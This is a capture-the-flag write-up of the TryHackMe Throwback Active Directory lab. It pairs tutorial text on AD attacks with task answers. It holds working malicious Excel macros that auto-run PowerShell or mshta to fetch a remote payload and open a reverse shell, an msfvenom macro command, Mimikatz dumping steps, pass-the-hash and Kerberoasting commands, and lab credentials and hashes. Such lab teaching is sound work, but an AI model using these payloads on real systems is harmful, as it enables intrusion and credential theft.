CTF-Writeups/TryHackMe/Throwback/Throwback.md

TryHackMe-Throwback

Introduction

What is Active Directory

Active Directory is a collection of machines and servers connected inside of domains, that are a collective part of a bigger forest of domains, that make up the Active Directory network. Active Directory contains many functioning bits and pieces, a majority of which we will be covering in the upcoming tasks. To outline what we'll be covering take a look over this list of Active Directory components and become familiar with the various pieces of Active Directory:

• Domain Controllers
• Forests, Trees, Domains
• Users + Groups
• Trusts
• Policies
• Domain Services

All of these parts of Active Directory come together to make a big network of machines and servers. Now that we know what Active Directory is, let's talk about the why.

Domain Controllers

A domain controller is a Windows server that has Active Directory Domain Services (AD DS) installed and has been promoted to a domain controller in the forest. Domain controllers are the center of Active Directory -- they control the rest of the domain. I will outline the tasks of a domain controller below: 

• holds the AD DS data store 
• handles authentication and authorization services 
• replicate updates from other domain controllers in the forest
• Allows admin access to manage domain resources

AD DS Data Store

The Active Directory Data Store holds the databases and processes needed to store and manage directory information such as users, groups, and services. Below is an outline of some of the contents and characteristics of the AD DS Data Store:

• Contains the NTDS.dit - a database that contains all of the information of an Active Directory domain controller as well as password hashes for domain users
• Stored by default in %SystemRoot%\NTDS
• accessible only by the domain controller

That is everything that you need to know in terms of physical and on-premise Active Directory. Now move on to learn about the software and infrastructure behind the network.

Forest Overview

A forest is a collection of one or more domain trees inside of an Active Directory network. It is what categorizes the parts of the network as a whole.

The Forest consists of these parts which we will go into farther detail with later:

• Trees - A hierarchy of domains in Active Directory Domain Services
• Domains - Used to group and manage objects 
• Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs
• Trusts - Allows users to access resources in other domains
• Objects - users, groups, printers, computers, shares
• Domain Services - DNS Server, LLMNR, IPv6
• Domain Schema - Rules for object creation

Active Directory forest visualized

Users Overview

Users are the core to Active Directory; without users why have Active Directory in the first place? There are four main types of users you'll find in an Active Directory network; however, there can be more depending on how a company manages the permissions of its users. The four types of users are: 

• Domain Admins - This is the big boss: they control the domains and are the only ones with access to the domain controller.
• Service Accounts (Can be Domain Admins) - These are for the most part never used except for service maintenance, they are required by Windows for services such as SQL to pair a service with a service account
• Local Administrators - These users can make changes to local machines as an administrator and may even be able to control other normal users, but they cannot access the domain controller
• Domain Users - These are your everyday users. They can log in on the machines they have the authorization to access and may have local administrator rights to machines depending on the organization.

Domain Policies Overview

Policies are a very big part of Active Directory, they dictate how the server operates and what rules it will and will not follow. You can think of domain policies like domain groups, except instead of permissions they contain rules, and instead of only applying to a group of users, the policies apply to a domain as a whole. They simply act as a rulebook for Active  Directory that a domain admin can modify and alter as they deem necessary to keep the network running smoothly and securely. Along with the very long list of default domain policies, domain admins can choose to add in their own policies not already on the domain controller, for example: if you wanted to disable windows defender across all machines on the domain you could create a new group policy object to disable Windows Defender. The options for domain policies are almost endless and are a big factor for attackers when enumerating an Active Directory network. I'll outline just a few of the  many policies that are default or you can create in an Active Directory environment: 

• Disable Windows Defender - Disables windows defender across all machine on the domain
• Digitally Sign Communication (Always) - Can disable or enable SMB signing on the domain controller

Domain Services Overview

Domain Services are exactly what they sound like. They are services that the domain controller provides to the rest of the domain or tree. There is a wide range of various services that can be added to a domain controller; however, in this room we'll only be going over the default services that come when you set up a Windows server as a domain controller. Outlined below are the default domain services: 

• LDAP - Lightweight Directory Access Protocol; provides communication between applications and directory services
• Certificate Services - allows the domain controller to create, validate, and revoke public key certificates
• DNS, LLMNR, NBT-NS - Domain Name Services for identifying IP hostnames

Domain Authentication Overview

The most important part of Active Directory -- as well as the most vulnerable part of Active Directory -- is the authentication protocols set in place. There are two main types of authentication in place for Active Directory: NTLM and Kerberos. Since these will be covered in more depth in later rooms we will not be covering past the very basics needed to understand how they apply to Active Directory as a whole. For more information on NTLM and Kerberos check out the Attacking Kerberos room - https://tryhackme.com/room/attackingkerberos.

• Kerberos - The default authentication service for Active Directory uses ticket-granting tickets and service tickets to authenticate users and give users access to other resources across the domain.
• NTLM - default Windows authentication protocol uses an encrypted challenge/response protocol

The Active Directory domain services are the main access point for attackers and contain some of the most vulnerable protocols for Active Directory, this will not be the last time you see them mentioned in terms of Active Directory security.

Introduction to Offensive Powershell

Well we have all this information now how can we apply it to attacking a windows network? We can utilize offensive powershell to enumerate and attack Windows and Windows Active Directory.

Basic Offensive Powershell

A majority of offensive Powershell will come from using Modules like ActiveDirectory and PowerView to enumerate and exploit however powershell also has a few cmdlets that you can use to your offensively.

Using Modules in Powershell

Powershell has the ability to import modules such as ActiveDirectory and PowerView to expand the list of cmdlets available. To import a module you can either use Import-Module module or you can use dot space dot backslash (. .\Module).

Examples of importing modules

    Import-Module Module

    . .\Module.ps1    

Note: . .\ will only work with powershell script files. All other modules will need to be imported with Import-Module for example ActiveDirectory can only be imported with Import-Module.

Get-ADDomain

Get-ADDomain is a commandlet that pulls a large majority of the information about the Domain you’re attacking. It can list all of the Domain Controllers for a given environment, tell you the NetBIOS Domain name, the FQDN (Fully Qualified Domain name) and much more. Using the Select-Object command, we can filter out some of the unnecessary objects that may be displayed (like COntainers, Group Policy Objects, and much more)

Get-ADDomain | Select-Object NetBIOSName, DNSRoot, InfrastructureMaster

Get-ADForest

Get-ADForest is another commandlet that pulls all the Domains within a Forest and lists them out to the user. This may be useful if a bidirectional trust is setup, it may allow you to gain a foothold in another domain on the LAN. Just like Get-ADDomain, there is a lot of output, so we will be using Select-Object to trim the output down.

Get-ADForest | Select-Object Domains

Get-ADTrust

Get-ADTrust is the last built in Powershell commandlet that we will be discussing, after this, we will move over to Powerview. Get-ADTrust provides a ton of information about the Trusts within the AD Domain. It can tell you if it’s a one way or bidirectional trust, who the source is, who the target is, and much more. One required field is -Filter, this is required in the event that you want to filter on a specific Domain/Trust, if you do not (like in most circumstances), you can simply provide a * to wildcard the results.

Get-ADTrust -Filter * | Select-Object Direction,Source,Target

Introduction to PowerView

Powerview (part of PowerSploit by PowerShellMafia) is an excellent suite of tools that can be used for enumeration, and exploitation of an AD Domain, today we’re only going to cover Powerview’s ability to enumerate information about the domain and their associated trusts, you can get the .ps1 here.

Get-NetDomain

Get-NetDomain is similar to the ActiveDirectory module’s Get-ADDomain but contains a lot less information, which can be better. Basic info such as the Forest, Domain Controllers, and Domain Name are enumerated.

Get-NetDomain

Get-NetDomainController

Get-NetDomainController is another useful cmdlet that will list all of the Domain Controllers within the network. This is incredibly useful for initial reconnaissance, especially if you do not have a Windows device that’s joined to the domain.

Get-NetDomainController    

Get-NetForest

Get-NetForest is similar to Get-ADForest, and provides similar output. It provides all the associated Domains, the root domain, as well as the Domain Controllers for the root domain.

Get-NetForest    

Get-NetDomainTrust

Get-NetDomainTrust is similar to Get-ADTrust with our SelectObject filter applied to it. It’s short, sweet and to the point!

Get-NetDomainTrust

LLMNR/NBT-NS Overview -

To fully understand how the LLMNR poisoning attack works we first need to understand how LLMNR and NBT-NS work and why they are a part of Windows active directory. The Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Windows domain services that act as an alternative method for host identification. You can think of LLMNR like DNS: it allows hosts on the same network to use name resolution for other hosts. NBT-NS is used to identify systems on a network by their NetBIOS name.

LLMNR Poisoning Overview -

You can spoof the source for name resolution on a victim network using responder, a tool used to respond to LLMNR and NBT-NS requests acting as though you know the identity of the host. "Poisoning" the service so that the victims will communicate with our machine. If the host belongs to a resource that requires identification the user and their NTLMv2 hash will be sent to the attacker. These hashes can then be collected from responder and taken offline to be cracked and then used to access the poisoned user's machines or can be taken into PSExec to get a shell.

Mimikatz Overview

Mimikatz is one of the most famous tools used for dumping passwords on Windows systems. It can be used to dump passwords on both a Windows Server and mainstream Windows versions. However, with its fame, it's patterns are incredibly recognizable and are almost immediately picked up by all Anti-Virus or Anti-Malware services. So you must disable endpoint protection before attempting to use Mimikatz or utilize an obfuscated version mimikatz with a C2. Mimikatz has many modules available and is being actively supported and updated. Here is the list of supported modules

• log
• privilege
• sekurlsa
• lsadump
• crypto
• vault
• token
• misc
• and many more

We will only be utilizing four of the modules for the lab, privilege, token, lsadump, and sekurlsa; however, mimikatz has a lot more modules and can be used more extensively.

Gaining Privilege

Once endpoint protection is disabled, you'll then be able to launch Mimikatz (with an Administrative Level User), you'll want to type privilege::debug which will then put you in Debug mode, a mode that can only be granted by an Administrator. From there, we will want to elevate privileges to NT Authority (if you don't have it already) with token::elevate. This will grant you the highest level access that Microsoft has to offer, which will allow you to do basically anything on the system. It's close to the Root user account in Linux.

1.) privilege::debug

2.) token::elevate

Checking privileges  and elevating privileges with mimikatz

Dumping Password Hashes

Mimikatz has a few options for dumping password hashes on Non-DC Endpoints well only be covering a few of the many commands and modules Mimikatz has. Mimikatz has a general template syntax most commands have the Mimikatz module first, followed by two colons, the command to be run, and any parameters that need to be specified at the end. for example

lsadump::lsa /patch

   lsadump is the mimikatz module itself

  lsa is the command within the module

  /patch is a specific parameter to patch something in this case a particular dll

sekurlsa::tickets /export

   sekurlsa is the mimikatz module

   tickets is the command withing the module

   /export is the parameter to export the tickets to the host

Dumping from LSA

The LSA (Local Security Authority) also handles credentials used by the system, from everything to basic password changes to creation of access tokens, it's another ideal candidate for us to dump hashes from. The output is not as large as lsadump::lsa which makes it much easier to work with.

1.) lsadump::lsa /patch    

Dumping SAM Hashes

The SAM (Security Account Manager) holds a copy of all the user's passwords which makes it a valuable file for us to dump. The output can be convoluted and large, so you should transport it onto your Kali machine for further analysis.

1.) lsadump::sam

Dumping SAM hashes with mimikatz

Dumping Creds from Logged In Users

Another method of attacking lsass through Mimikatz is with the sekurlsa module. It will attempt to retrieve the credentials/hashes of currently logged in users. This being the least preferred method for dumping credentials in Mimikatz.

1.) sekurlsa::logonPasswords

Pivoting Overview

In a good network, often referred to as a “Segmented Network” there are certain rules in place preventing users from accessing certain parts of the Internal LAN (ex. The Workstation Subnet should not be able to access the Server Subnet). This can be a headache for Pentesters on occasion as most networks are not segmented, these networks are referred to as “Flat Networks”. To make Segmented Networks more like flat networks there are a proxying tools such as Proxychains or SSHuttle which make it incredibly easy to pivot from one subnet in a LAN to another. Metasploit offers a Proxy server as part of its Post Exploitation tool suite which will be covered below.

Introduction to Pivoting with proxychains

Auto-Routing our Traffic

To setup a proxy server you will need a meterpreter session or a reverse shell open in metasploit before hand. You can easily get a meterpreter shell by uploading a payload to the machine and executing it.

1.) background

2.) use post/multi/manage/autoroute

3.) set SESSION 1

4.) set SUBNET 10.200.x.0

Listing the configured options for autoroute

5.) exploit

Launching our new autoroute

Setting up our Proxy with Metasploit

1.) use auxiliary/server/socks4a

2.) (optional) Change you port, you can either keep the default 1080 port or change it to an open port of your choice.

Configuring and Using the Proxy Chain

1.) sudo nano /etc/proxychains.conf

You will need to comment out the socks4 proxy on 9050 which is a default proxy for tor and add the proxy chain we just created with the port that you gave when creating the proxies.

Adding our Socks4a server to the proxychains configuration file

2.) proxychains <command>    

You can now run any normal commands or tools that you want and it will be forwarded through the proxy chain if you append your tool or command with “proxychains”.

An example of running a command through proxy chains

Pivoting with proxychains

Pivoting may seem like a very big and scary thing but it is actually fairly simple after you have your proxy server set up. After setting up the proxy server you can pivot to any machines or resources that the proxy server has access to. For example if you had a proxy server on example-ws01 and example-ws02 was segmented by a security groups that made it so only example-ws01 had access you could use your proxy server on example-ws01 to access example-ws02. You can use any way of accessing the machine that you would usually like ssh, rdp, win-rm, psexec you just have to prepend the command with proxychains.

Examples of pivoting

  1.) proxychains ssh user@MACHINE_IP

   2.) proxychains xfreerdp /u:user /p:password /v:MACHINE_IP

  3.) proxychains evil-winrm -i MACHINE_IP -u user -p password    

Setting up a Web Proxy with FoxyProxy

Now that we have a proxy setup to forward our traffic through we need a way to easily access the resources on the network. Let's add an extension to our web browser to allow us to easily route our traffic through it! For this room, we'll be using 'FoxyProxy Standard' on firefox. Navigate to the following link to install FoxyProxy Standard: Link

FoxyProxy Standard install card

1.) Click on FoxyProxy among your extensions. After that, click on 'Options', Then click on 'Add'.

FoxyProxy Options Panel

2.) Enter in the following setting you will need to fill in the title, proxy type (SOCKS4), Proxy IP, and Port then click 'Save'. 

FoxyProxy add proxy menu

3.) Click on Foxy Proxy in your extensions and enable the web proxy.

FoxyProxy enable menu

Now that we have enumerated and attacked all initial vectors we can begin to collect the credentials that we have as well as what footholds we have on the network, to see how we could laterally move throughout the network. The first thing to do when we have credentials but don't know what to do with them is to pass the hash with them. This check each IP and validates the credentials. You will need to practice passing the hash with the hash you dumped in Task 20 as well as the hash from Task 10. 

Pass the Hash Overview

Pass the hash (PtH) is an attack wherein we can leverage found NTLM or LanMan hashes of user passwords in order to successfully authenticate as the user they belong to. This is possible due to well-intentioned security ‘feature’ within Windows where passwords, prior to being sent over the network, are hashed in a predictable manner. Done originally with the intent of avoidance of password disclosure, we can leverage this feature to capture and replay hashes, allowing us to authenticate as our victim users. In this section, we’ll dig into this further with the tool crackmapexec.

Installing crackmapexec

1.) sudo apt install crackmapexec    

Note: We have received reports that the latest version of CrackMapExec segfaults, we recommend using a prior version like 5.0.2dev until further updates are released.

Crackmapexec help menu

Conquering Hashes with crackmapexec

1.) Configure proxychains to the proxy server that will be sending your requests. You will need a proxy server to pivot to the other machines and bypass segmentation. You can also utilize sshuttle as a proxy server to pivot.

2.) proxychains crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>    

Success! We got a hit passing the hash!

To continue on you can either use the hashes from mimikatz or cracked passwords from Task 10 to pass the hash then access the device(s). To access the device(s) you can either use the hashes with evil-winrm or you can attempt to crack the hashes and use ssh or rdp.

Enumeration with Bloodhound

Bloodhound is a graphical interface that allows you to visually map out the network using database visualization from neo4j. Bloodhound along with Sharphound or any bloodhound ingestor takes the user, groups, trusts and more of a domain and collects them into .json files and created a graphical database in neo4j to view information of the network. 

Well be focusing on how to collect the .json files and import them into Bloodhound, then make basic and custom queries in neo4j

Bloodhound Installation

1.) sudo apt install bloodhound 

2.) neo4j console

default credentials:

    user:neo4j

    pass:neo4j    

Getting Loot with Sharphound

You will need to download Sharphound here. We suggest downloading the .ps1 script file.

From your host machine

1.) python3 -m http.server    

From the target device

2.) wget tun0_IP:8000/Sharphound.ps1 -outfile Sharphound.ps1    

3.) powershell -ep bypass

4.) . .\Sharphound.ps1

    or 

    Import-Module .\Sharphound.ps1    

5.) Invoke-Bloodhound -CollectionMethod All -Domain THROWBACK.local -ZipFileName loot.zip

Launching Sharphound to enumerate domain information

Mapping the Network with Bloodhound 

1.) scp loot.zip @10.200.x.222:/Users/Administrator/Downloads/loot.zip    

2.) sudo neo4j console

3.) bloodhound    

4.) Sign into Bloodhound using the same credentials you set with neo4j.

Bloodhound login panel

5.) In Bloodhound look for the 'upload data' icon / text and upload the json files / zip folder.

6.) To view the graphed network open the menu and select queries this will you a list of pre-compiled queries to choose from.

Selecting the 'Queries' sub-menu in Bloodhound

Bloodhound has many queries to utilize such as 'find all domain admins'.

Results of a query of domain admins

There are many pre-built queries to utilize that can help enumerate a domain.

Pre-built queries within Bloodhound

Kerberoasting Overview

In this section, we'll be covering one of the most popular Kerberos attacks - Kerberoasting. Kerberoasting allows a user to request a service ticket for any service with a registered SPN then use that ticket to crack the service password. If the service has a registered SPN then it can be Kerberoastable however the success of the attack depends on how strong the password is and if it is crackable as well as the privileges of the cracked service account. To enumerate Kerberoastable accounts use BloodHound to find all Kerberoastable accounts, it will allow you to see what kind of accounts you can kerberoast, if they are domain admins, and what kind of connections they have to the rest of the domain.

Impacket Installation

Impacket releases have been unstable since 0.9.20, I suggest getting an installation of Impacket < 0.9.20

1.) pip3 install impacket

2.) locate impacket

or

1.) cd /opt

2.) Download the precompiled package from https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_19

3.) cd Impacket-0.9.19

4.) pip install .

Kerberoasting with Impacket

1.) cd /usr/share/doc/python3-impacket/examples

2.) proxychains sudo python3 GetUserSPNs.py -dc-ip 10.200.x.117 THROWBACK.local/user:password -request    

We can use any valid set of credentials on the workstation to kerberoast with for example HumphreyW's password from pfsense or if you don't have a valid set of credentials yet you can also dump hashes with mimikatz and attempt to crack them to get a valid set of credentials.

Sample Output from GetUserSPNs.py

Crack those Hashes with Hashcat

1.) hashcat -m 13100 -a 0 hash.txt rockyou.txt    

Sample KRB5TGS hash cracked with Hashcat

Malicious Macros Overview

Picture this, you are a manager for one of the top accounting firms in the United States. As you walk across the floor, you notice one thing in common: Every device has the Microsoft Office suite installed. This shouldn’t be any surprise to you, as reported in Microsoft’s 2019 Annual report, Office 365 (Commercial) has 180 million users. For an attacker, this is an extremely large attack surface. As an attacker, all you need to do is get one person to click on an Excel/Office document, and they could be the downfall of an organization.

Source: https://www.microsoft.com/investor/reports/ar19/index.html

Creating a Simple Macro

To start, you’ll want to register an account with Microsoft, then download and install Office to your lab machine.

Note: You will need a windows 10 machine for this portion of the lab if you have a windows 10 host you can utilize it or you can spin up a local vm of windows. Please do not use lab machines on the 10.200.0.0 subnet this will ruin the lab experience for others.

After installed, start Excel and create a new workbook and head over to the “View” tab.

Microsoft Excel with the View Tab Open

Within there, you will find a section called “Macros”, Clicking the button will display a drop-down menu where you will have the option to create a new Macro. Click “Create New Macro”, you should see a new window open.

Microsoft Excel with the Macro Creation Window Open

You can name your new Macro whatever you like. It’s important to know that later, the Macro name is not just an arbitrary value. It can add some additional functions, and do some special things that will help us later. After entering a name for the Macro, and clicking “Create” you should see a new window open that looks very different from Excel’s normal interface.

Microsoft’s Visual Basic Macro Editor

This is Microsoft’s Visual Basic Macro Creator/Editor. This is where we will eventually create our Malicious Macro. Here, we can write visual basics to perform actions, even execute OS commands. For example, we can use:

PID = Shell("powershell.exe -c Invoke-WebRequest -Uri https://192.168.125.1/shadow -OutFile C:\Shadow", vbNormalFocus)

This will connect out to a remote server and download the file “Shadow” and save it to the root of the file system as a file called “Shadow” (How creative).

A Python HTTP Server Listening with a Macro to Call Out to it

Let's say we wanted to step it up a notch and require the user to not interact with the Macro to trigger the remote connection to the HTTP Server, is this possible? If so, how can we do it?

It turns out, the answer is “Yes, (onto the) Next Question” and “Very easily”. To make a Macro execute on the document opening, we can add a useful “Sub” called “Auto_Open”. Upon document opening, whatever is in that Sub will be run, in this scenario, I’ll call the HelloWorld Sub upon document opening with the following code below.

Adding our malicious PowerShell code to the macro

Code Below:

Sub HelloWorld()

    PID = Shell("powershell.exe -c Invoke-WebRequest -Uri https://192.168.125.1/passwd -OutFile C:\\passwd", vbNormalFocus)

End Sub

  

Sub Auto\_Open()

    HelloWorld

End Sub

After saving this document as an xlsm (Excel Macro-Enabled Document) and upon reopening it, we should see a call out to our remote web server attempting to retrieve the file “passwd”.

Microsoft Excel Prompting the User to Accept Use of Macros

But what, what's this?

Microsoft has added a feature where the user must authorize Macros to be executed on the document to help protect the end-user. Fortunately, most people just don’t care and will click “Enable Content” or have the “Allow All Macros” setting enabled by default.

After pressing “Display Content” we can see the request come into our web server as expected:

After Accepting Macros, the Macro Reaches Out to an HTTP Server

Creating a Malicious Macro

Now that you are more familiar with creating a Macro and utilizing the Auto_Open feature within Office Products, we can dive into creating and generating malicious Macros.

First, we will start off by manually creating a macro. We will be re-using the code from the previous section as our base, and we will also be utilizing Metasploit’s HTA Server to gain a reverse shell.

To set up Metasploit’s HTA Server for payload delivery you will need to use the module exploit/windows/misc/hta_server as seen in the screenshot below:

Starting Metasploit’s HTA Server for Remote Payload Delivery

The URL containing the “Local IP” (In this case: https://192.168.100.128:8080/c94O6fz.hta) is the server that will deliver the payload to the unsuspecting victim. At the moment, we only have a URL that will deliver a payload, so how does this get executed on the machine?

Simply reaching out to the remote server won’t cause the payload to fire, because it’s not an executable (It’s a .hta). We can use mshta.exe (A built-in executable on Windows devices that’s used to aid in script execution with HTML applications) to execute the file on the remote server and return a shell. You can do this by calling mshta.exe followed by the URL of the Payload Delivery server, ex. https://192.168.100.128:8080/c94O6fz.hta, so the full command would look as follows.

mshta.exe https://192.168.100.128:8080/c9406fx.hta    

If we simply change our previous command in our “Hello World” Macro from Invoke-WebRequest to the command above (Remember, your IP address will be different), we will have a reverse shell returned.

The Updated Hello World Macro with mshta.exe being executed

Code Below:

Sub HelloWorld()

    PID = Shell("mshta.exe https://192.168.100.128:8080/c9496fz.hta")

End Sub

  

Sub Auto\_Open()

    HelloWorld

End Sub

If we run the script Macro now, we should see mshta.exe reach out to our Payload server and successfully deliver the payload.

The Microsoft HTA Server Successfully Delivered The Payload, Landing a Shell

Generating Macros with msfvenom

Alternatively, you can use msfvenom to create Malicious Macros, the syntax is much simpler, all you need to do is the following:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=53 -f vba -o macro.vba    

The above command will generate a Visual Basic Macro that will execute a reverse shell, your output will look something like so and will go directly into your Macro.

Utilizing MSFVenom to Generate a Malicious Macro

You will need to take the given visual basic macro from MSFVenom and paste it into the excel macro editor.

The Macro Pasted into Microsoft’s Visual Basic Macro Editor.

Note: This is only an alternative to show theory behind malicious macros. There is Anti-Virus enabled on the box and we highly recommend that you take the HTA server route for creating a malicious macro.

Sending off the Malicious Macro

After setting up exploit/multi/handler to catch the Reverse Shell, we are ready to have the end-user open the Document.

Utilizing Metasploit’s exploit/multi/handler to catch a Reverse Shell

Compromising the Target System with the use of Malicious Macros

Success, our payload successfully fired, the end-user has absolutely no knowledge that we have compromised their system. If you attempt to use this in the real world (with Authorization of course), it’s ideal that you populate the spreadsheet with actual data. Opening up a spreadsheet/document with absolutely no data is a quick way to raise some alarms.

Finding an Attack Vector

Attempting to find an attack vector to successfully utilize Malicious Macros may be difficult at first, the trick is asking yourself “Is a human going to read this?”. If you answer “Yes”, it’s worth attempting this attack. You should be cautious when using this attack because you never know who’s inbox it might end up in. The last thing you want is IT aware of your presence on the network..

Tasks

Entering the Breach

What is the domain name?

THROWBACK.local

What is the HTTP title of the web server running on THROWBACK-PROD?

Throwback Hacks

How many ports are open on THROWBACK-MAIL? 4

What service is running on THROWBACK-FW01?

pfsense What version of Apache is running on THROWBACK-MAIL?

Apache/2.4.29

Exploring the Caverns

Who is the CEO of Throwback Hacks? 

Summers Winters

Where is the company located?

Great Britain

What is the guest username on the mail server?

tbhguest

What is the guest password on the mail server?

WelcomeTBH1!

Web Shells and You!

What username was used to access the configuration portal?

admin

What password was used to access the configuration portal?

pfsense

What menu tab contains a command prompt tab in the PFSense Configuration panel?

Diagnostics

First Contact

What log file was found that is not a default log?

login.log

What user was found within the log?

HumphreyW

What is the hash of the user? 1c13639dba96c7b53d26f7d00956a364

Wait, just you mean just one this time?

What is the username parameter in the POST request?

login_username

What is the password parameter in the POST request?

secretkey

What username found with hydra starts with an M?

MurphyF

What is the password found with hydra?

Summer2020

Gone Phishing

What User was compromised via Phishing?

BlaireJ

What Machine was compromised during Phishing?

THROWBACK-WS01

Just a Drop Will Do

What User fell victim to LLMNR Poisoning?

PetersJ

What is the 4th octet of the IP Address the LLMNR request came from?

219

What is the hostname of the device?

THROWBACK-PROD

We Will, We Will, Rockyou

What is the cracked password from the pfSense hash?

secuirtycenter

What is the cracked password from LLMNR poisoning?

Throwback317

Building Your Own Dark... er Deathstar

No answer needed only to setup starkiller and powershell-empire

Deploy the Grunts!

We only want to make the listener and the stager with the proper IP , host and with windows/launcher_bat

Get-Help Invoke-WorldDomination

In this task we only needed to host that backdoor on our local machine , transfer it to the target machine and execute it there

SEATBELT CHECK!

What user was found from seatbelt?

admin-petersj

Dump It Like It's Hot

Understanding mimikatz post-exploitation tool

Not the soft and fluffy kind

What domain user was logged in?

BlaireJ

What is the user's hash?

c374ecb7c2ccac1df3a82bce4f80bb5b

What is the administrator's NTLM hash?

a06e58d15a2585235d18598788b8147a

Yo Dawg, I heard you like proxies.

No answer needed just to get a meterpreter session run autoroute and socks4 proxy

Good Intentions, Courtesy of Microsoft

What two users could successfully pass the hash to THROWBACK-WS01? (In alphabetical order)

HumphreyW, BlaireJ

Wallace and Gromit

What service account is kerberoastable? SQLSERVICE

What domain does the trust connect to?
CORPERATE.LOCAl

What normal user account is a domain admin? MERCERH

With three heads you'd think they'd at least agree once

What account was compromised by kerberoasting?

SQLSERVICE

What password was cracked from the retrieved ticket?

mysql337570

You're Five Minutes Late...

What is the hostname of the device?
THROWBACK-TIME

What is the title of the web page?
Throwback Hacks Timekeep

What user was the password reset for? murphyf

Word to your Mother

What web server accepts XLSMs as a file upload? THROWBACK-TIME

what page is the file upload in?
timesheet.php

What is the name of the XLSMs that you can upload? Timesheet.xlsm

Meterpreter session 1 closed. Reason: World-Domination

Which user's hashes were we able to dump? Timekeeper

What is the user's hash starting from the third colon? 901682b1433fdf0b04ef42b13e343486

What is the administrator's hash starting from the third colon? 43d73c6a52e8626eabc5eb77148dca0b

What is the user's cracked password? keeperoftime

We gotta drop the load!

What database are the timekeep login users located?
timekeepusers

What database are the domain users located in?
domain_users

What table was located in the domain users database?
users

What is the first username in the table? ClemonsD

So we're doing this again...

What user was successfully password sprayed? JeffersD

What was the password for the user?

Throwback2020

SYNCHRONIZE

What user has dcsync rights? backup

What user can we dump credentials for and is an administrator? MercerH

This forest has trust issues

What domain has a trust relationship with THROWBACK.local? CORPORATE.LOCAL

What is the hostname of the machine that has a forest trust with the domain controller?
CORP-DC01

What is the Administrator account we can use to access the second forest?
MercerH

What is the name of the file in the Administrator's Documents folder? server_update.txt

r/badcode would like a word

What User has a Github Account? Rikka Foxx

What was the user found in github?
DaviesJ

What password was found in github?
Management2018

What machine can you access with the credentials? CORP-ADT01

Identity Theft is not a Joke Jim

What file is on the Administrator's Documents folder?
email_update.txt

Who wrote the email?
Karen Dosier

What is her official title in the company? Human Realtions Consulatant

Lost and Found

What is the Users email who has been affected by the Databreach? SEC-JStewart@TBHSecurity.com

What was the Users password?
aqAwM53cW8AgRbfr

What credentials could be found in the Email?

Format: User:Pass

TBSEC_GUEST:WelcomeTBSEC1!